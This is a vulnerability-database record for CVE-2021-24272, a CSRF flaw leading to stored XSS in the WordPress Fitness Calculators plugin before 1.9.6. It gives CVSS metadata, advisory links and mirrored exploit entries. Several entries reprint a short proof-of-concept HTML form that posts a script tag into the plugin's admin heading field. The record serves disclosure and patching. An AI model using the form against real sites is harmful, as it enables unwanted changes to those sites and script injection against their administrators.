Description
The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
Affected Software
Related
{"id": "CVE-2021-24272", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24272", "description": "The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue", "published": "2021-05-05T19:15:00", "modified": "2021-12-03T19:59:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24272", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "http://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html"], "cvelist": ["CVE-2021-24272"], "immutableFields": [], "lastseen": "2022-03-23T14:50:43", "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164261"]}, {"type": "patchstack", "idList": ["PATCHSTACK:D86DD962E94B5A6A242FCC273B53A5A4"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "zdt", "idList": ["1337DAY-ID-36795"]}]}, "score": {"value": 2.2, "vector": "NONE"}, "twitter": {"counter": 3, "modified": "2021-09-24T07:26:54", "tweets": [{"link": "https://twitter.com/RemotelyAlerts/status/1466876747387858946", "text": "Severity: | The fitness calculators WordPress plugin... | CVE-2021-24272 | Link for more: https://t.co/dLM2CGYL3f"}, {"link": "https://twitter.com/hernanespinoza/status/1390323907580862466", "text": "CVEnew: CVE-2021-24272 The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, s\u2026 https://t.co/Hu2MGDDnHF?amp=1"}, {"link": "https://twitter.com/hernanespinoza/status/1390323907580862466", "text": "CVEnew: CVE-2021-24272 The fitness calculators WordPress plugin before 1.9.6 add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, s\u2026 https://t.co/Hu2MGDDnHF?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164261"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F"]}, {"type": "zdt", "idList": ["1337DAY-ID-36795"]}]}, "exploitation": null, "vulnersScore": 2.2}, "_state": {"dependencies": 1660004461, "score": 1659898735}, "_internal": {"score_hash": "0cb50c7962120a067d6f010959e5b3fb"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-352"], "affectedSoftware": [{"cpeName": "codeinitiator:fitness_calculators", "version": "1.9.6", "operator": "lt", "name": "codeinitiator fitness calculators"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:codeinitiator:fitness_calculators:1.9.6:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.9.6", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "name": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "name": "http://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"wpexploit": [{"lastseen": "2021-05-12T03:38:42", "description": "The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n", "cvss3": {}, "published": "2021-04-14T00:00:00", "type": "wpexploit", "title": "Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-16T07:02:57", "id": "WPEX-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F", "href": "", "sourceData": "<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\r\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\r\n <input type=\"submit\" value=\"Save\" name=\"submit\">\r\n</form>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:39", "description": "Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability discovered by 0xB9 in WordPress fitness calculators plugin (versions <= 1.9.5).\n\n## Solution\n\n\r\n Update the WordPress fitness calculators plugin to the latest available version (at least 1.9.6).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-04-14T00:00:00", "type": "patchstack", "title": "WordPress fitness calculators plugin <= 1.9.5 - Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-14T00:00:00", "id": "PATCHSTACK:D86DD962E94B5A6A242FCC273B53A5A4", "href": "https://patchstack.com/database/vulnerability/fitness-calculators/wordpress-fitness-calculators-plugin-1-9-5-cross-site-request-forgery-csrf-leading-to-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-05-12T03:38:42", "description": "The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {}, "published": "2021-04-14T00:00:00", "type": "wpvulndb", "title": "Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24272"], "modified": "2021-04-16T07:02:57", "id": "WPVDB-ID:E643040B-1F3B-4C13-8A20-ACFD069DCC4F", "href": "https://wpscan.com/vulnerability/e643040b-1f3b-4c13-8a20-acfd069dcc4f", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-12-04T15:50:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "zdt", "title": "WordPress Fitness Calculators 1.9.5 Plugin - Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "1337DAY-ID-36795", "href": "https://0day.today/exploit/description/36795", "sourceData": "# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/fitness-calculators/\n# Version: 1.9.5\n# Tested on: Windows 10\n# CVE: CVE-2021-24272\n\n1. Description:\nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\n\n2. Proof of Concept:\n\n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\n <input type=\"submit\" value=\"Save\" name=\"submit\">\n</form>\n", "sourceHref": "https://0day.today/exploit/36795", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-09-23T15:45:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "packetstorm", "title": "WordPress Fitness Calculators 1.9.5 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "PACKETSTORM:164261", "href": "https://packetstormsecurity.com/files/164261/WordPress-Fitness-Calculators-1.9.5-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) \n# Date: 2/28/2021 \n# Author: 0xB9 \n# Software Link: https://wordpress.org/plugins/fitness-calculators/ \n# Version: 1.9.5 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24272 \n \n1. Description: \nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue \n \n2. Proof of Concept: \n \n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\"> \n<input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\"> \n<input type=\"submit\" value=\"Save\" name=\"submit\"> \n</form> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164261/wpfitnesscalaculators195-xsrf.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-08-10T22:04:40", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-09-23T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24272", "CVE-2021-24272"], "modified": "2021-09-23T00:00:00", "id": "EDB-ID:50325", "href": "https://www.exploit-db.com/exploits/50325", "sourceData": "# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)\r\n# Date: 2/28/2021\r\n# Author: 0xB9\r\n# Software Link: https://wordpress.org/plugins/fitness-calculators/\r\n# Version: 1.9.5\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24272\r\n\r\n1. Description:\r\nThe plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. \r\nDue to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue\r\n\r\n2. Proof of Concept:\r\n\r\n<form method=\"post\" action=\"https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water\">\r\n <input type=\"text\" value=\"<script>alert(1)</script>\" name=\"fcw[fcw_heading]\">\r\n <input type=\"submit\" value=\"Save\" name=\"submit\">\r\n</form>", "sourceHref": "https://www.exploit-db.com/download/50325", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
CVE-2021-24272
